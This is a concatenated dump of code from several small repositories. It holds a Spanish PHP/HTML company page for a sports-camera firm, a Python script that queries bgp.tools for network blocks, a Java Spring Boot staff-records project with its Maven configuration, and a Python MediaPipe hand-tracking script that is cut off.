a los diversos tipos de ambientes y deportes extremos, con lentes de vista panorámica, excelente calidad de imagen; contando estas con una gran capacidad de almacenamiento para poder así satisfacer las necesidades más exigentes de nuestros clientes.
</p>
</div>
</div>
<!-- Aqui va una pequeña descripcion de lo que es la historia de la empresa -->
<!-- Section: Blog v.3 -->
<section class="my-5">
<!-- Section heading -->
<h2 class="h1-responsive font-weight-bold text-center my-5">Nuestro Orgullo</h2>
<!-- Section description -->
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-lg-5 col-xl-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-1-half mb-lg-0 mb-4">
<img class="img-fluid" src="../../resources/img/post.jpg" alt="Sample image">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
</div>
<br><br>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-7 col-xl-8">
<!-- Post title -->
<h3 class="font-weight-bold mb-3"><strong>Mejor Empresa de Camaras Deportivas</strong></h3>
<!-- Excerpt -->
<p class="dark-grey-text">FocusView ha sido ganadora a la mejor empresa de camaras deportivas desarrolladas
de alto nivel, superando a sus mas grandes rivales y a toda la competencia con esta increible foto que gano un premio a la mejor foto del año.</p>
<!-- Post data -->
<p>by <a class="font-weight-bold"><NAME></a>, 19/04/2018</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
</div>
<br><br>
<!-- Section description -->
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-lg-5 col-xl-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-1-half mb-lg-0 mb-4">
<img class="img-fluid" src="../../resources/img/post2.jpg" alt="Sample image">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
</div>
<br><br>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-7 col-xl-8">
<!-- Post title -->
<h3 class="font-weight-bold mb-3"><strong>Mejores camara con estabilizador de imagen</strong></h3>
<!-- Excerpt -->
<p class="dark-grey-text">FocusView ha sido ganadora a la mejor empresa de camaras deportivas con estabilizador de imagen desarrolladas
de alto nivel, superando a sus mas grandes rivales y a toda la competencia con esta increible foto que gano un premio a la mejor foto del año.</p>
<!-- Post data -->
<p>by <a class="font-weight-bold"><NAME></a>, 19/04/2018</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
</div>
<br><br>
<!-- Section description -->
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-lg-5 col-xl-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-1-half mb-lg-0 mb-4">
<img class="img-fluid" src="../../resources/img/post3.jpg" alt="Sample image">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
</div>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-7 col-xl-8">
<!-- Post title -->
<h3 class="font-weight-bold mb-3"><strong>Mejor Empresa de grabacion de video</strong></h3>
<!-- Excerpt -->
<p class="dark-grey-text">FocusView ha sido ganadora a la mejor empresa de camaras deportivas que tiene la mejor grabacion de video desarrolladas
de alto nivel, superando a sus mas grandes rivales y a toda la competencia con esta increible foto que gano un premio a la mejor foto del año.</p>
<!-- Post data -->
<p>by <a class="font-weight-bold"><NAME></a>, 19/04/2018</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
</div>
</section>
<!-- -->
<br><br>
<!-- Aqui va mision y vision-->
<!-- aqui el ceo -->
<div class="jumbotron jumbotron-fluid">
<div class="container">
<h1 class="display-4">CEOs</h1>
<p class="lead"></p>
</div>
</div>
<!-- aqui van nuestras identidades -->
<section class="text-center my-5">
<!-- Section heading -->
<!-- Section description -->
<p class="dark-grey-text w-responsive mx-auto mb-5">
</p>
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-lg-4 col-md-12 mb-lg-0 mb-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-2 mb-4">
<img class="img-fluid" src="../../resources/img/carlos2.jpg" alt="Sample image" width="420" >
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
<!-- Category -->
<a href="#!" class="pink-text">
<h6 class="font-weight-bold mb-3"><i class="fas fa-map pr-2"></i>JAVASCRIPT EXPERT</h6>
</a>
<!-- Post title -->
<h4 class="font-weight-bold mb-3"><strong><NAME></strong></h4>
<!-- Excerpt -->
<p class="dark-grey-text">Nacio en El Salvador, San Salvador, actualemente es un emprendedor de tiempo completo que ayuda a resolver problemas
para la comunidad y desarrolla tecnologia a todas personas que necesitan.</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-4 col-md-6 mb-md-0 mb-4">
<!-- Featured image -->
<div class="view overlay rounded z-depth-2 mb-4">
<img class="img-fluid" src="../../resources/img/eze2.jpg" alt="Sample image" width="320">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
<!-- Category -->
<a href="#!" class="deep-orange-text">
<h6 class="font-weight-bold mb-3"><i class="fas fa-graduation-cap pr-2"></i>PHP EXPERT</h6>
</a>
<!-- Post title -->
<h4 class="font-weight-bold mb-3"><strong>Ezequ<NAME></strong></h4>
<!-- Excerpt -->
<p class="dark-grey-text">Nacio en El Salvador, San Salvador, me encanta la tecnologia creo que se puede aplicar en muchos campos hoy en dia y que sin duda
esta para que nosotros la aprovechemos al maximo.
</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-lg-4 col-md-6 mb-0">
<!-- Featured image -->
<div class="view overlay rounded z-depth-2 mb-4">
<img class="img-fluid" src="../../resources/img/gerar3.jpg" alt="Sample image" width="420">
<a>
<div class="mask rgba-white-slight"></div>
</a>
</div>
<!-- Category -->
<a href="#!" class="blue-text">
<h6 class="font-weight-bold mb-3"><i class="fas fa-fire pr-2"></i>PYTHON EXPERT</h6>
</a>
<!-- Post title -->
<h4 class="font-weight-bold mb-3"><strong><NAME></strong></h4>
<!-- Excerpt -->
<p class="dark-grey-text">Nacio en El Salvador, San Salvador, cuando era pequeño super que la tecnologia me atraia y que hoy en dia es muy escensial para nuestra vida diaria
y para poder progresar como raza humana.
</p>
<!-- Read more button -->
</div>
<!-- Grid column -->
</div>
<!-- Grid row -->
</section>
<br><br>
<!-- Donde estamos ubicados -->
<!-- Section: Blog v.4 -->
<section class="my-5">
<!-- Grid row -->
<div class="row">
<!-- Grid column -->
<div class="col-md-12">
<!-- Card -->
<div class="card card-cascade wider reverse">
<!-- Card image -->
<div class="view view-cascade overlay">
<img class="card-img-top" src="../../resources/img/bannershido.jpg" alt="Sample image">
<a href="#!">
<div class="mask rgba-white-slight"></div>
</a>
</div>
<!-- Card content -->
<div class="card-body card-body-cascade text-center">
<!-- Title -->
<h2 class="font-weight-bold"><a>FocusView</a></h2>
<!-- Social shares -->
<div class="social-counters">
<!-- Facebook -->
<a class="btn btn-fb">
<i class="fab fa-facebook-f pr-2"></i>
<span class="clearfix d-none d-md-inline-block">Facebook</span>
</a>
<span class="counter">46</span>
<!-- Twitter -->
<a class="btn btn-tw">
<i class="fab fa-twitter pr-2"></i>
<span class="clearfix d-none d-md-inline-block">Twitter</span>
</a>
<span class="counter">22</span>
<!-- Google+ -->
<a class="btn btn-gplus">
<i class="fab fa-google-plus-g pr-2"></i>
<span class="clearfix d-none d-md-inline-block">Google+</span>
</a>
<span class="counter">31</span>
<!-- Comments -->
<a class="btn btn-default">
<i class="far fa-comments pr-2"></i>
<span class="clearfix d-none d-md-inline-block">Comments</span>
</a>
<span class="counter">18</span>
</div>
<!-- Social shares -->
</div>
<!-- Card content -->
</div>
</div>
<!-- Grid column -->
</div>
<!-- Grid row -->
</section>
<!-- Section: Blog v.4 -->
<!-- Va el footer que lo manda a llamar -->
<?php
require('../../core/models/basefooter.php');
basefooter::bfooter();
?>
<!-- -->
<!-- Esta parte es el footer de la pagina donde se encuentran nuestras redes sociales -->
<script src="../../resources/js/jquery-3.2.1.slim.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="../../resources/js/popper.min.js"></script>
<script src="../../resources/js/bootstrap.min.js"></script>
</body>
</html><file_sep>$(document).ready(function() {
// aqui el código
});<file_sep><?php
/*Creamos una clase con una funcion que imprime el codigo html del header
para ahorrar codigo y colocar el header */
class baseheader {
static function bhead(){
print('
<br>
<div class="Conteiner">
<!-- Esta es la seccion de de el header -->
<div id="link" class="text-center white-text " style="background-color: #000000">
<div class="card-body">
<ul class="nav justify-content-center">
<li class="nav-item">
<a class="nav-link active" href="#home">Inicio</a>
</li>
<li class="nav-item">
<a class="nav-link active" href="#footer">Contáctenos</a>
</li>
<li class="nav-item">
<a class="nav-link active" href="#">Nuevos Productos</a>
</li>
<li class="nav-item">
<a class="nav-link disable" href="#nosotros" tabindex="-1" aria-disable="true">Sobre Nosotros</a>
</li>
</ul>
</div>
</div>
<!--esta parte es la barra de navegacion -->
<nav class="navbar navbar-expand-lg navbar-light fixed-top" style="background-color: #000000">
<form class="form-inline my-2 my-lg-0">
<input class="form-control mr-sm-2" type="text" placeholder="Search">
<button class="btn btn-outline-success my-2 my-sm-0" type="submit">Search</button>
</form>
<button class="navbar-toggler-dark" type="button" data-toggle="collapse" data-target="#collapsibleNavId" aria-controls="collapsibleNavId"
aria-expanded="false" aria-label="Toggle navigation"></button>
<div id="link" class="collapse navbar-collapse" id="collapsibleNavId">
<ul class="navbar-nav mt-2 mt-lg-0 ml-auto">
<li class="nav-item active">
<a class="nav-link" href="#">Iniciar Sesion<span class="sr-only">(current)</span></a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">Comprar</a>
</li>
</ul>
</div>
</nav>
</div>
');
}
} | eeb564e33bcbeb68c86f0d4c3b30bb8b7affe3c0 | [
"JavaScript",
"PHP"
] | 7 | PHP | Ezejosue/PruebaExpo | c68649a7fdde8af66e019644a5f5609258fa4380 | 44f9c72611f7ec43183ab031804142965a15b4f0 |
refs/heads/master | <repo_name>ActorExpose/bgp-search<file_sep>/bgp_search.py
# v.0.1 - Written by SI9INT (https://twitter.com/si9int) | 2020-03
#!/usr/bin/env python3
import requests, argparse
from bs4 import BeautifulSoup as bs
ipv4 = []
ipv6 = []
def search(term):
# https://bgp.tools
result = requests.get('https://bgp.tools/search?q=' + term).text
html = bs(result, 'html.parser')
for tr in html.find_all('tr'):
try:
inetnum = tr.find('a').text
desc = tr.find_all('td', {'class' : 'nowrap'})[1].text
cc = tr.find_all('td', {'class' : 'nowrap'})[0].img.get('alt')
if not inetnum.startswith('AS'):
if '::' in inetnum:
ipv6.append((inetnum, desc, cc))
else:
ipv4.append((inetnum, desc, cc))
except AttributeError:
pass
print('[!] Result | \033[93mIPv4\033[0m\n')
for inetnum in ipv4:
print('\t+ [{}] {}\t ({})'.format(inetnum[2], inetnum[0], inetnum[1]))
print('\n[!] Result | \033[93mIPv6\033[0m\n')
for inetnum in ipv6:
print('\t+ [{}] {}\t ({})'.format(inetnum[2], inetnum[0], inetnum[1]))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='A small script which allows to search for netblocks on bgp.tools')
parser.add_argument('-s', '--search', required=True, help='search string, e.g. "DoD"')
args = parser.parse_args()
if args.search:
print('[-] Requesting data for {} ..'.format(args.search))
search(args.search)
print('\n[-] Finished! Good bye ..')
<file_sep>/README.md
## BGP Search
A Python wrapper for searching on https://bgp.tools. Useful for recon.
- Requires "BeautifulSoup"
```
pip3 install bs4
```
**Usage**
```
python3 bgp_search.py [-h] -s SEARCH
A small script which allows to search for netblocks on bgp.tools
optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
search string, e.g. "DoD"
```
**Output**
```
$ python3 bgp_search.py -s "DoD"
---
[!] Result | IPv4
+ 192.168.3.11/24 (DoD Network Information Center)
+ 172.16.58.3/24 (DoD Network Information Center)
+ 172.16.17.32/23 (DoD Network Information Center)
+ 172.16.31.10/24 (DoD Network Information Center)
+ 172.16.58.3/24 (DoD Network Information Center)
+ 172.16.58.3/24 (DoD Network Information Center)
...
```
| 89c3f739e9aa9bd7b0b942423ca97bb4e03f8268 | [
"Markdown",
"Python"
] | 2 | Python | ActorExpose/bgp-search | 727056b0855633a88b8c4fed2a8837567c1829fc | a3bb7e29a375a1964af3853f6ed89633eee90bb0 |
refs/heads/main | <file_sep># Morse-Code-Sound<file_sep>import winsound
import json
import time
TIME_UNIT = 200 #ms
FREQUENCY = 1000
def play_morse_code(text=None, file_path=None, TIME_UNIT=200, FREQUENCY=1000):
if text:
words = [i.strip().split(' ') for i in text.split('\n')]
elif file_path:
words = [i.strip().split(' ') for i in open('text.txt', 'r').readlines()]
else:
raise ValueError('No text or file specified')
with open('translator.json', 'r') as file:
translator = json.load(file)
for row in words:
for word in row:
print(f'new word: {word}')
for char in word:
char_morse_code = translator[char.lower()]
print(char, char_morse_code)
for char in char_morse_code:
winsound.Beep(FREQUENCY, (1 if char == '.' else 3)*TIME_UNIT)
time.sleep(TIME_UNIT/1000)
time.sleep((TIME_UNIT*3)/1000)
time.sleep((TIME_UNIT*7)/1000)
#play_morse_code(text='sos', TIME_UNIT=150, FREQUENCY=500)
| 89763987936dfd5a727c35c765624c6f81467f7a | [
"Markdown",
"Python"
] | 2 | Markdown | erencan-02/Morse-Code-Sound | c8ef543fcd3d220d77a96931ca05a504c29c98ed | 9d685c0ec89feee7fa7cdfd22e76ace7943c3b5b |
refs/heads/master | <file_sep>package com.example.myspringdemo;
/*
@RunWith(SpringRunner.class)
@SpringBootTest
public class MySpringDemoApplicationTests {
@Test
public void contextLoads() {
}
}
*/<file_sep>package com.example.myspringdemo.service;
import com.example.myspringdemo.entity.Officer;
import java.sql.Date;
import java.util.List;
public interface OfficerService {
Officer addOfficer(Officer officer);
void delete (long id);
Officer getByFullName(String FullName);
Officer editOfficer (Officer officer);
List<Officer> getAll();
List<Officer>findByFullName(String FullName);
List<Officer>findByDateOfBirthGreaterThan(Date date);
List<Officer>findByDateReceivedGreaterThan(Date date);
List<Officer>findByDateOfDismissalGreaterThan(Date date);
List<Officer>findByPositionLike(String name);
List<Officer>findByDepartmentLike(String name);
void save(Officer o1);
}
<file_sep>package com.example.myspringdemo.repository;
/*
@Repository
public interface PositionRepository extends CrudRepository<Position, Long> {
List<Position> findByNameOfPosition(String name);
}
*/<file_sep>package com.example.myspringdemo.repository;
import com.example.myspringdemo.entity.Department;
import org.springframework.data.jpa.repository.JpaRepository;
import java.util.List;
//@Repository
public interface DepartmentRepository extends JpaRepository<Department, Long> {
List<Department> findByNameOfDepartmentStartsWithIgnoreCase(String nameOfDepartment);
}
<file_sep>package com.example.myspringdemo.entity;
import javax.persistence.*;
@Entity
@Table(name = "DEPARTMENT")
public class Department {
@Id
@GeneratedValue
//@Column(name = "Id",nullable = false)
private Long id;
//@Column(name = "NameOfDepartment",length = 100,nullable = false)
private String nameOfDepartment;
public Department(String nameOfDepartment, String s){
}
public Department(String nameOfDepartment){
this.nameOfDepartment = nameOfDepartment;
}
public Long getId(){
return id;
}
//public void setId(Long id){this.id=id;}
public String getNameOfDepartment(){
return nameOfDepartment;
}
public void setNameOfDepartment(String nameOfDepartment){
this.nameOfDepartment = nameOfDepartment;
}
@Override
public String toString(){
return String.format("Department[id=%d, nameOfDepartment]",id, nameOfDepartment);
}
}
<file_sep>package com.example.myspringdemo.service;
import com.example.myspringdemo.entity.Department;
import java.util.List;
public interface DepartmentService {
Department addDepartment(Department department);
void delete (long id);
Department getByNameOfDepartment(String FullName);
Department editDepartment (Department department);
List<Department> getAll();
}
<file_sep><?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.1.6.RELEASE</version>
<relativePath/> <!-- lookup parent from com.example.myspringdemo.dao -->
</parent>
<groupId>com.example</groupId>
<artifactId>myspringdemo</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>jar</packaging>
<name>myspringdemo</name>
<description>Demo project for Spring Boot</description>
<properties>
<spring.boot.version>2.1.6.RELEASE</spring.boot.version>
<spring.mvc.version>5.1.8.RELEASE</spring.mvc.version>
<hibernate.version>5.4.3.Final</hibernate.version>
<java.version>1.8</java.version>
<spring.data>1.3.4.RELEASE</spring.data>
<javax.servlet>3.0.1</javax.servlet>
<!-- <hb.manager>4.2.5.Final</hb.manager>-->
<hb.manager>5.3.10.Final</hb.manager>
<spring.test>3.2.4.RELEASE</spring.test>
<junit.version>4.11</junit.version>
<version.vaadin>13.0.11</version.vaadin>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
</properties>
<dependencies>
<dependency>
<groupId>javax.servlet</groupId>
<artifactId>javax.servlet-api</artifactId>
<version>${javax.servlet}</version>
<scope>compile</scope>
<!--
<scope>provided</scope>
-->
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<version>${spring.boot.version}</version>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-tomcat</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jetty</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-jpa</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-rest</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-hateoas</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jdbc</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jersey</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web-services</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-webflux</artifactId>
<version>${spring.boot.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.data</groupId>
<artifactId>spring-data-rest-hal-browser</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.session</groupId>
<artifactId>spring-session-jdbc</artifactId>
<version>2.1.7.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-webmvc</artifactId>
<version>${spring.mvc.version}</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>io.projectreactor</groupId>
<artifactId>reactor-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<scope>runtime</scope>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-entitymanager</artifactId>
<version>5.4.3.Final</version>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-core</artifactId>
<!-- <version>${hb.manager}</version> -->
<version>5.4.3.Final</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-bom</artifactId>
<version>13.0.11</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-button-flow</artifactId>
<version>2.0.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-notification-flow</artifactId>
<version>2.0.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-ordered-layout-flow</artifactId>
<version>2.0.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>flow-server</artifactId>
<version>2.0.4</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-grid-flow</artifactId>
<version>4.0.2</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>flow-data</artifactId>
<version>1.2.3</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-icons-flow</artifactId>
<version>1.2.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-text-field-flow</artifactId>
<version>1.2.1</version>
</dependency>
<!--
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-spring</artifactId>
<version>10.1.1</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-spring-boot-starter</artifactId>
<version>13.0.11</version>
</dependency>
-->
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-spring-boot-starter</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-jpa</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
<!-- vaadin4spring https://github.com/peholmst/vaadin4spring
contains lots of handy helpers for serious Spring + Vaadin
applications. This example uses event bus to decouple the editor
form from the MainUI class.
-->
<dependency>
<groupId>org.vaadin.spring.extensions</groupId>
<artifactId>vaadin-spring-ext-boot</artifactId>
</dependency>
<dependency>
<groupId>org.vaadin.spring.addons</groupId>
<artifactId>vaadin-spring-addon-eventbus</artifactId>
</dependency>
<dependency>
<groupId>org.vaadin</groupId>
<artifactId>viritin</artifactId>
</dependency>
<!-- Using Vaadin add-ons with client side extensions is easy, switch
as an example in this project, see also vaadin-maven-plugin
configuration.
-->
<dependency>
<groupId>org.vaadin.teemu</groupId>
<artifactId>switch</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jdbc</artifactId>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<scope>runtime</scope>
</dependency>
<dependency>
<groupId>org.liquibase</groupId>
<artifactId>liquibase-core</artifactId>
<version>3.7.0</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-devtools</artifactId>
<optional>true</optional>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>flow-spring-addon</artifactId>
<version>1.0.0.beta7</version>
</dependency>
</dependencies>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-bom</artifactId>
<version>${version.vaadin}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>org.vaadin.spring.extensions</groupId>
<artifactId>vaadin-spring-ext-boot</artifactId>
<version>2.0.0.RELEASE</version>
</dependency>
<dependency>
<groupId>org.vaadin.spring.addons</groupId>
<artifactId>vaadin-spring-addon-eventbus</artifactId>
<version>2.0.0.RELEASE</version>
</dependency>
<dependency>
<groupId>org.vaadin</groupId>
<artifactId>viritin</artifactId>
<version>2.8</version>
</dependency>
<dependency>
<groupId>org.vaadin.teemu</groupId>
<artifactId>switch</artifactId>
<version>3.0.0</version>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
<plugin>
<groupId>org.liquibase</groupId>
<artifactId>liquibase-maven-plugin</artifactId>
<version>3.6.3</version>
<configuration>
<propertyFile>src/main/resources/application.yml</propertyFile>
</configuration>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<configuration>
<source>1.8</source>
<target>1.8</target>
</configuration>
</plugin>
<!-- Using client side Vaadin add-ons (Switch in this example)
require a custom built "widgetset". Vaadin maven plugin does
that automatically, here using a handy cloud service with CDN
hosting.
-->
<plugin>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-maven-plugin</artifactId>
<version>${version.vaadin}</version>
<executions>
<execution>
<goals>
<!-- Needed for theme: -->
<goal>update-widgetset</goal>
<goal>compile</goal>
<!-- Needed for theme: -->
<goal>update-theme</goal>
<goal>compile-theme</goal>
</goals>
</execution>
</executions>
<configuration>
<!-- Use local as value here for local widgetset compilation -->
<widgetsetMode>cdn</widgetsetMode>
</configuration>
</plugin>
</plugins>
</build>
<repositories>
<repository>
<id>vaadin-addons</id>
<url>http://maven.vaadin.com/vaadin-addons</url>
</repository>
</repositories>
</project>
<file_sep>package com.example.myspringdemo.service.impl;
import com.example.myspringdemo.repository.OfficerRepository;
import com.example.myspringdemo.entity.Officer;
import com.example.myspringdemo.service.OfficerService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.sql.Date;
import java.util.List;
@Service
public class OfficerServiceImpl implements OfficerService {
@Autowired
private OfficerRepository officerRepository;
@Override
public Officer addOfficer(Officer officer){
Officer savedOfficer = officerRepository.save(officer);
return savedOfficer;
}
@Override
public void delete(long id) {
officerRepository.deleteById(id);
}
@Override
public Officer getByFullName(String FullName) {
return (Officer) officerRepository.findByFullName(FullName);
}
@Override
public Officer editOfficer(Officer officer) {
return officerRepository.save(officer);
}
@Override
public List<Officer> getAll() {
return (List<Officer>) officerRepository.findAll();
}
@Override
public List<Officer> findByFullName(String FullName) {
return null;
}
@Override
public List<Officer> findByDateOfBirthGreaterThan(Date date) {
return null;
}
@Override
public List<Officer> findByDateReceivedGreaterThan(Date date) {
return null;
}
@Override
public List<Officer> findByDateOfDismissalGreaterThan(Date date) {
return null;
}
@Override
public List<Officer> findByPositionLike(String name) {
return null;
}
@Override
public List<Officer> findByDepartmentLike(String name) {
return null;
}
@Override
public void save(Officer o1) {
}
}
<file_sep>package com.example.myspringdemo.entity;
import org.hibernate.annotations.GenericGenerator;
import javax.persistence.*;
import java.util.Date;
@Entity
@Table(name="OFFICER")
public class Officer {
@Id
@GeneratedValue (generator = "increment")
@GenericGenerator(name="increment",strategy ="increment")
@Column(name="Id",nullable = false)
private Long id;
@Column(name="FullName")
private String fullName;
public Officer(){
}
public Officer(String fullName){
this.fullName = fullName;
}
public Long getId(){
return id;
}
public void setId(Long id){
this.id=id;
}
public String getFullName(){
return fullName;
}
public void setFullName(String fullName) {this.fullName = fullName;}
@Temporal(TemporalType.DATE)
@Column(name = "DateOfBirth")
private Date dateOfBirth;
@Temporal(TemporalType.DATE)
@Column(name="DateReceived")
private Date dateReceived;
@Temporal(TemporalType.DATE)
@Column(name="DateOfDesmissal")
private Date dateOfDismissal;
@Column(name = "POSITION")
private String position;
@Column(name = "DEPARTMENT")
private String department;
public Date getDateOfBirth() {
return dateOfBirth;
}
public void setDateOfBirth(Date dateOfBirth) {
this.dateOfBirth = dateOfBirth;
}
public Date getDateReceived(){
return dateReceived;
}
public void setDateReceived(Date dateReceived){
this.dateReceived = dateReceived;
}
public Date getDateOfDismissal(){
return dateOfDismissal;
}
public void setDateOfDismissal(Date dateOfDismissal){
this.dateOfDismissal = dateOfDismissal;
}
public String getPosition(){
return position;
}
public void setPosition(String position) {
this.position = position;
}
public String getDepartment(){
return department;
}
public void setDepartment(String department){
this.department = department;
}
}
<file_sep>package com.example.myspringdemo;
import com.vaadin.flow.data.binder.HasItems;
public interface HasFilterableDataProvider<T,F>
extends HasItems<T> {
}
| 5bc50b62cb8edc70c7e17de54446b4aedd85321f | [
"Java",
"Maven POM"
] | 10 | Java | seyseven/myspringdemo | 49e74499c7adff48ad2f9908d5b65ebdb0dccf49 | cff7fcea5a0cbfe892f3de70c48cb9a0c72b036f |
refs/heads/main | <file_sep>import mediapipe as mp
import time
import cv2
class handDetector():
def __init__(self,mode=False,is_authenticated=True,maxHands=2,detection_confidence=0.5,tracking_confidence=0.5):
self.mode = mode
self.maxHands = maxHands
self.detection_confidence= detection_confidence
self.tracking_confidence = tracking_confidence
self.mp_hands = mp.solutions.hands
self.hands = self.mp_hands.Hands(self.mode,self.maxHands,self.detection_confidence,self.tracking_confidence)
self.mp_draw= mp.solutions.drawing_utils
def Find_hands(self, img, draw=True):
img_RGB = cv2.cvtColor( img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(img_RGB)
#print(results.multi_hand_landmarks)
if self.results.multi_hand_landmarks:
for hand_marks in self.results.multi_hand_landmarks:
if draw:
self.mp_draw.draw_landmarks(img,hand_marks, self.mp_hands.HAND_CONNECTIONS )
return img
def Find_position(self, img, hand_no = 0, draw= True):
self.land_mark_list =[]
if self.results.multi_hand_landmarks:
my_hand = self.results.multi_hand_landmarks[hand_no]
for id, land_mark in enumerate(my_hand.landmark):
#print(id, land_mark)
h,w,c = img.shape
center_x, center_y = int(land_mark.x*w), int(land_mark.y*h)
#print(id, center_x,center_y)
self.land_mark_list.append([id , center_x, center_y])
if draw:
cv2.circle(img, (center_x,center_y), 5, (255,55,55), cv2.FILLED)
return self.land_mark_list
def main():
previous_time = 0
current_time = 0
vid = cv2.VideoCapture(0)
detector = handDetector()
while(True):
success, img = vid.read()
img = detector.Find_hands(img)
land_mark_list = detector.Find_position(img)
# print(land_mark_list[4])
if len(land_mark_list)!=0 :
print(land_mark_list[4])
current_time= time.time()
fps = 1/ (current_time - previous_time)
previous_time = current_time
cv2.putText(img, str(int(fps)), (10,70), cv2.FONT_HERSHEY_PLAIN, 3, (200,0,0),3)
cv2.imshow("Image",img)
